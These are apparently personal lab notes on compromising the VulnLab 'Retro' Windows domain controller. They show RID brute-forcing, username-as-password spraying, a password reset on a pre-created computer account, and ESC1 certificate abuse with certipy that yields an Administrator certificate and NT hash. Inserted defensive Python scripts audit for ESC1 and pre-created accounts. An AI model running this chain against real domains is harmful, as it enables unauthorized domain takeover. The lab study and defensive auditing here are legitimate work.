Retro
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Windows
Chain: False (standalone compromise)
Username: trainee
Password: trainee
Initial access: Username as Password (Bruteforce userlist)
Privilege: Domain User
✅ Valid Usernames
jburley
trainee
tblack
HelpDesk
🔑 Passwords list
trainee
# Nmap 7.94SVN scan initiated Tue Apr 1 12:18:06 2025 as: nmap -p- -A --open -T5 -Pn -n -oN ext_retro_tcp_allports -vvv --min-rate 3000 10.10.105.102
53/tcp open tcpwrapped syn-ack
88/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3268/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
49664/tcp open tcpwrapped syn-ack
49669/tcp open tcpwrapped syn-ack
49679/tcp open tcpwrapped syn-ack
49711/tcp open tcpwrapped syn-ack
Not vulnerable to AXFR
Server allows null session
Server allows guest user
No Group.xml (GPP file) found.
nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus
nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus -o DOWNLOAD_FLAG=True
File: Important.txt
--------------------------------------------------------------------------------------------
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
nxc smb 10.10.105.102 -u 'dfdfsd' -p '' --rid-brute
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.105.102 445 DC [+] retro.vl\dfdfsd: (Guest)
SMB 10.10.105.102 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.10.105.102 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.10.105.102 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.10.105.102 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.10.105.102 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.10.105.102 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.10.105.102 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.10.105.102 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.105.102 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.10.105.102 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.105.102 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.105.102 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.105.102 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.10.105.102 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.10.105.102 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.105.102 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.105.102 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.105.102 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.105.102 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.105.102 445 DC 1109: RETRO\tblack (SidTypeUser)
nxc smb 10.10.105.102 -u users.txt -p users.txt --no-bruteforce
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
<SNIP>
SMB 10.10.105.102 445 DC [+] retro.vl\trainee:trainee
nxc smb 10.10.105.102 -u trainee -p trainee --share notes -M spider_plus -o DOWNLOAD_FLAG=True
File: ToDo.txt
-----------------------------------------------------------------------------------------
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
certipy-ad find -u trainee -p trainee -vulnerable -stdout -dc-ip 10.10.105.102
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
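The ESC1 line above is the conjunction of four template settings plus a weak enrollment ACL. The following is an added audit script, not certipy's code and not part of the original notes, that evaluates those conditions over a template record shaped like certipy's output. The RetroClients values are copied from the output above; the PRIVILEGED set, the EKU list and the suggested fixes are assumptions of this example.

```python
# Added example, not from the original notes: ESC1 audit over a template record
# shaped like certipy's "find" output.

# Principals assumed to be already privileged (enrollment by them is not a finding).
PRIVILEGED = {"Administrators", "Domain Admins", "Enterprise Admins", "Administrator"}

# EKUs that let the issued certificate be used for Kerberos (PKINIT) logon.
CLIENT_AUTH_EKUS = {
    "Client Authentication",
    "PKINIT Client Authentication",
    "Smart Card Logon",
    "Any Purpose",
}

# Values copied from the certipy output for the RetroClients template.
RETRO_CLIENTS = {
    "Template Name": "RetroClients",
    "Enabled": True,
    "Enrollee Supplies Subject": True,
    "Any Purpose": False,
    "Extended Key Usage": ["Client Authentication"],
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Enrollment Rights": [
        "RETRO.VL\\Domain Admins",
        "RETRO.VL\\Domain Computers",
        "RETRO.VL\\Enterprise Admins",
    ],
}


def short_name(principal):
    """'RETRO.VL\\Domain Computers' -> 'Domain Computers'."""
    return principal.rsplit("\\", 1)[-1]


def allows_client_auth(template):
    """A template with no EKU at all is treated as usable for any purpose."""
    ekus = set(template["Extended Key Usage"])
    return template["Any Purpose"] or not ekus or bool(ekus & CLIENT_AUTH_EKUS)


def low_privilege_enrollers(template):
    return [p for p in template["Enrollment Rights"] if short_name(p) not in PRIVILEGED]


def check_esc1(template):
    """Return the low-privilege enrollers if the template meets every ESC1 condition, else []."""
    if not template["Enabled"]:
        return []
    if not template["Enrollee Supplies Subject"]:
        return []
    if not allows_client_auth(template):
        return []
    if template["Requires Manager Approval"]:
        return []
    if template["Authorized Signatures Required"] > 0:
        return []
    return low_privilege_enrollers(template)


def esc1_fixes(template):
    """Any single entry removes the ESC1 condition; pick the one that fits the template's purpose."""
    enrollers = check_esc1(template)
    if not enrollers:
        return []
    return [
        "Clear 'Enrollee Supplies Subject' so the subject is built from AD, not the request.",
        "Enable 'Requires Manager Approval' so every issuance is reviewed.",
        "Remove enrollment rights for: " + ", ".join(enrollers),
    ]


if __name__ == "__main__":
    hits = check_esc1(RETRO_CLIENTS)
    print(f"{RETRO_CLIENTS['Template Name']}: ESC1={bool(hits)} via {hits}")
    for fix in esc1_fixes(RETRO_CLIENTS):
        print("  -", fix)
```

Run against RetroClients it reports `RETRO.VL\Domain Computers` as the offending enroller, which is exactly why a computer account (rather than trainee) is needed later in these notes.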
In Active Directory, when an administrator creates a computer account with the "Assign this computer account as a pre-Windows 2000 computer" option enabled, the account's password is set to the computer name in lowercase without the trailing "$". For example, a computer account named "Workstation1$" has the default password "workstation1". Until that password is changed the account cannot log on (the DC answers STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, as in the nxc attempt below), but the default password is accepted for a password change over SAMR, after which the account authenticates like any other domain computer.
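From the defender's side, these accounts are easy to inventory: a pre-created computer account carries WORKSTATION_TRUST_ACCOUNT together with PASSWD_NOTREQD in userAccountControl (decimal 4128). The script below is an added example, not part of the original notes, that decodes the relevant bits and lists such accounts. The records are constructed sample data (the names mirror this box, the userAccountControl values are assumed for illustration); the LDAP filter constant is the equivalent query for a real directory.

```python
# Added example, not from the original notes: find pre-created (pre-Windows 2000)
# computer accounts from their userAccountControl value.

# Subset of userAccountControl bits (MS-ADTS / MS-SAMR flag names).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
}

# WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD == 4128, the value a pre-created
# account keeps until a machine actually joins with it or the password is reset.
PRECREATED_MASK = 0x1000 | 0x0020

# Same test as an LDAP filter (1.2.840.113556.1.4.803 is the bitwise-AND matching rule).
LDAP_FILTER = (
    "(&(objectClass=computer)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4096)"
    "(userAccountControl:1.2.840.113556.1.4.803:=32))"
)

# Constructed sample records (values assumed, not pulled from the box).
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",      "userAccountControl": 0x2000 | 0x10000},
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128},
    {"sAMAccountName": "WS01$",    "userAccountControl": 0x1000},
    {"sAMAccountName": "OLD01$",   "userAccountControl": 4128 | 0x0002},
]


def decode_uac(value):
    """Return the set of known flag names set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def is_precreated(record):
    return record["userAccountControl"] & PRECREATED_MASK == PRECREATED_MASK


def find_precreated(records):
    """Names of pre-created computer accounts, disabled ones included."""
    return [r["sAMAccountName"] for r in records if is_precreated(r)]


def report(records):
    """(name, enabled?) pairs so a disabled leftover can be triaged separately."""
    return [
        (r["sAMAccountName"], "ACCOUNTDISABLE" not in decode_uac(r["userAccountControl"]))
        for r in records
        if is_precreated(r)
    ]


if __name__ == "__main__":
    for name, enabled in report(SAMPLE_COMPUTERS):
        state = "ENABLED" if enabled else "disabled"
        print(f"{name}: pre-created computer account ({state})")
```

Enabled hits are the ones to act on: either finish joining the machine so it sets its own password, or reset the password (what the notes do with impacket-changepasswd, done by an admin instead) or delete the stale object. The ToDo.txt note about the finance department's old computer account is exactly this kind of leftover.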
nxc ldap 10.10.105.102 -u trainee -p trainee --bloodhound -c all --dns-server 10.10.105.102
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP 10.10.105.102 389 DC [+] retro.vl\trainee:trainee
LDAP 10.10.105.102 389 DC Resolved collection methods: acl, group, localadmin, container, psremote, trusts, rdp, objectprops, dcom, session
LDAP 10.10.105.102 389 DC Done in 00M 29S
LDAP 10.10.105.102 389 DC Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.105.102_2025-04-01_131248_bloodhound.zip
❯ nxc smb 10.10.105.102 -u BANKING$ -p banking
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.105.102 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
❯ impacket-changepasswd retro.vl/'BANKING$':'banking'@10.10.105.102 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
certipy-ad req -u BANKING$ -p password123! -dc-ip 10.10.105.102 -ca retro-DC-CA -template RetroClients -upn Administrator -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
certipy-ad auth -dc-ip 10.10.105.102 -username Administrator -pfx administrator.pfx -domain retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389